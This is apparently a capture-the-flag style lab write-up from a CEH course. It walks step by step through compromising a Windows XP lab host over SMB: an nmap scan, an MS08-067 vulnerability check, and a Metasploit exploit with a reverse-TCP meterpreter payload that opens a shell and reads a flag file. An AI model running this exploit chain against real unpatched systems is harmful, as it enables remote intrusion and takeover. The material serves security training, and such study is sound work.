Another machine available during the CEH course, but this one was pretty straight forward.
Maq103 – MÁQUINA 192.168.10.103
Descrição: Isso que dá utilizar um sistema operacional desatualizado e sem suporte da fabricante.
Descrição: Isso que dá utilizar um sistema operacional desatualizado e sem suporte da fabricante.
The description fo this machine is telling us the OS is not up-to-date anymore and the vendor support is over, so lets look for active services:
root@parrot:~# nmap -sV -O 192.168.10.103 Nmap scan report for 192.168.10.103 Host is up (0.015s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Service Network Distance: 2 hops Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Good, SMB is active and being one of the primary attack vectors is where we’ll put our efforts. nmap had a script to check against a few vulnerabilities at once, the smb-check-vulns, but it was split into six scripts so we’ll need to run them separately.
Looking for the nmap scripts.
root@parrot:~# locate *.nse | grep smb /usr/share/nmap/scripts/smb-brute.nse /usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse /usr/share/nmap/scripts/smb-enum-domains.nse /usr/share/nmap/scripts/smb-enum-groups.nse /usr/share/nmap/scripts/smb-enum-processes.nse /usr/share/nmap/scripts/smb-enum-sessions.nse /usr/share/nmap/scripts/smb-enum-shares.nse /usr/share/nmap/scripts/smb-enum-users.nse /usr/share/nmap/scripts/smb-flood.nse /usr/share/nmap/scripts/smb-ls.nse /usr/share/nmap/scripts/smb-mbenum.nse /usr/share/nmap/scripts/smb-os-discovery.nse /usr/share/nmap/scripts/smb-print-text.nse /usr/share/nmap/scripts/smb-protocols.nse /usr/share/nmap/scripts/smb-psexec.nse /usr/share/nmap/scripts/smb-security-mode.nse /usr/share/nmap/scripts/smb-server-stats.nse /usr/share/nmap/scripts/smb-system-info.nse /usr/share/nmap/scripts/smb-vuln-conficker.nse /usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse /usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse /usr/share/nmap/scripts/smb-vuln-ms06-025.nse /usr/share/nmap/scripts/smb-vuln-ms07-029.nse /usr/share/nmap/scripts/smb-vuln-ms08-067.nse /usr/share/nmap/scripts/smb-vuln-ms10-054.nse /usr/share/nmap/scripts/smb-vuln-ms10-061.nse /usr/share/nmap/scripts/smb-vuln-ms17-010.nse /usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse /usr/share/nmap/scripts/smb2-capabilities.nse /usr/share/nmap/scripts/smb2-security-mode.nse /usr/share/nmap/scripts/smb2-time.nse /usr/share/nmap/scripts/smb2-vuln-uptime.nse
After a few tries I found one with chances to work.
root@parrot:~# nmap -sV -O 192.168.10.103 --script smb-vuln-ms08-067.nse Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
We are going to use the Metasploit for this one:
root@parrot:~# service postgresql start root@parrot:~# msfconsole
Now we’ll search for the exploit, set the desired payload and set the options for the exploit:
msf > search MS08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption msf > use exploit/windows/smb/ms08_067_netapi msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.10.103 RHOST => 192.168.10.103 msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445 RPORT => 445 msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.200.2 LHOST => 192.168.200.2
It’s time to seat the finger (?! – senta o dedo)
msf exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.200.2:4444 [*] 192.168.10.103:445 - Automatically detecting the target... [*] 192.168.10.103:445 - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown [*] 192.168.10.103:445 - We could not detect the language pack, defaulting to English [*] 192.168.10.103:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] 192.168.10.103:445 - Attempting to trigger the vulnerability... [*] Sending stage (179779 bytes) to 192.168.10.103 [*] Meterpreter session 2 opened (192.168.200.2:4444 -> 192.168.10.103:1030) at 2018-03-27 09:54:59 -0300 meterpreter > shell Process 876 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>type c:\flag.txt ch4mp10n5-n3v3r-g1v3-up!
As soon as the session was open we invoke a shell and read the flag which we already knew where to find. The machine is wide open letting us do anything we want. We’re done here.